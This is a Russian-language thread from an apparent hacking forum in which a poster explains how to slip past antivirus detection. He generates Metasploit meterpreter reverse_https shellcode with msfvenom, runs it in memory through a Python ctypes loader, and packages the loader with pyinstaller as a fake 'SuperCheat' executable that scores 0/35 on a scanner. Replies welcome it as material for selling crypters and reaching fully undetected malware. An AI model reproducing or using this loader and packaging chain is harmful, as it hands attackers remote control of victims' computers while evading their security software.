• VLMI - форум по обмену информацией. На форуме можете найти способы заработка, разнообразную информацию по интернет-безопасности, обмен знаниями, курсы/сливы.

    После регистрации будут доступны основные разделы.

    Контент форума создают пользователи, администрация за действия пользователей не несёт ответственности, отказ от ответственности. Так же перед использованием форума необходимо ознакомиться с правилами ресурса. Продолжая использовать ресурс вы соглашаетесь с правилами.
  • Подпишись на наш канал в Telegram для информации о актуальных зеркалах форума: https://t.me/vlmiclub

Обход антивируса с помощью ctypes (python)

mixa264

Авторитет
Сообщения
1.445
Реакции
2.117
0 руб.
Обход антивируса с помощью ctypes (python)

Привет колеги.

Сегодня покажу очень простенький пример обхода антивируса с помощью библиотеки ctypes в языке программирования python.

Суть обхода в том эта библиотека дает нам возможность выполнять код C|C++ в питоновском скрипте.

И мы смело сможем запустить шеллкод метасплоита в оперативной памяти.

Вы уж простите много писать пока не буду,времени очень мало у меня,отпишу потом пояснения в коментариях если возникнут вопросы у кого то .))

Вообщем ближе к делу

И так проделываем следующие шаги:

1) Создаем шеллкод командой:

Код
Код:
msfvenom -p windows/meterpreter/reverse_https lport=1337 lhost=192.168.137.137 -b \0x0a\0x0b\0xff -f c


6c3ffe096414da89467cb.jpg


тут ничего пояснять думаю не нужно ,лишь обратить внимания стоит на параметр -b которым мы указываем которые плохие символы в шеллкоде нужно не использовать.

Дальше создаем скрипт на питоне следуещого вида:

Код
from ctypes import *

shellcode = ("Тут_копипастим_наш шеллкод_созданный_через_msf_venom");

tralivali = create_string_buffer(shellcode, len(shellcode))
shell = cast(tralivali, CFUNCTYPE(c_void_p))

shell()


105adc359382174dd4188.png


2820fe9195b4f7a2c0159.png


Собираем через pyinstaller на Windows системе..

Код
Код:
C:\Python27\Scripts\pyinstaller.exe -F --noconsole --onefile --icon=C:\Users\CorpOfHack\Desktop\contacts.ico C:\Users\CorpOfHack\Desktop\SuperCheat.py

98e94e7f73e3077e4b9d8.jpg


Хочу заметить что когда я не использовал картинку мне показало на https://nodistribute.com/ 0/35

а когда добавил иконку то 8/35. Почему пока не выяснял.

4fe6a9be7526c6cfb988b.png


Вот без картинки

А вот с картинкой

Ну в любом случае результат не плохой. Все спасибо за внимания. Надеюсь был полезен

Просторы интернета
 

Xaos

Резидент
Сообщения
158
Реакции
311
0 руб.
Please note, if you want to make a deal with this user, that it is blocked.
Надеюсь был полезен
Очень.
Пойду продавать крипт. А вообще, с нынешними ценами на крипт, который, дай Бог, держится 1-2 дня, такая инфа на вес золота, тем более авторская и с пруфами, как понимаю, учитывая то, что с конечным файлом можно побаловаться немного и получить заветный FUD 100%.
 

Sergo145

Участник
Сообщения
2
Реакции
1
0 руб.
Как раз недавно искал криптор нормальный, а тут такая инфа полезная. Спасибо огромное!
 

$_Vova_$

Участник
Сообщения
35
Реакции
28
0 руб.
Telegram
msfvenom -p windows/meterpreter/reverse_https lport=1337 lhost=192.168.137.137 -b \0x0a\0x0b\0xff -f c
^
SyntaxError: invalid syntax


(и да я рукожоп)
 

mixa264

Авторитет
Сообщения
1.445
Реакции
2.117
0 руб.
msfvenom -p windows/meterpreter/reverse_https lport=1337 lhost=192.168.137.137 -b \0x0a\0x0b\0xff -f c
^
SyntaxError: invalid syntax


(и да я рукожоп)
Я тоже. И питона не знаю))) Поэтому дождёмся ответов протестировавших
 
Сверху Снизу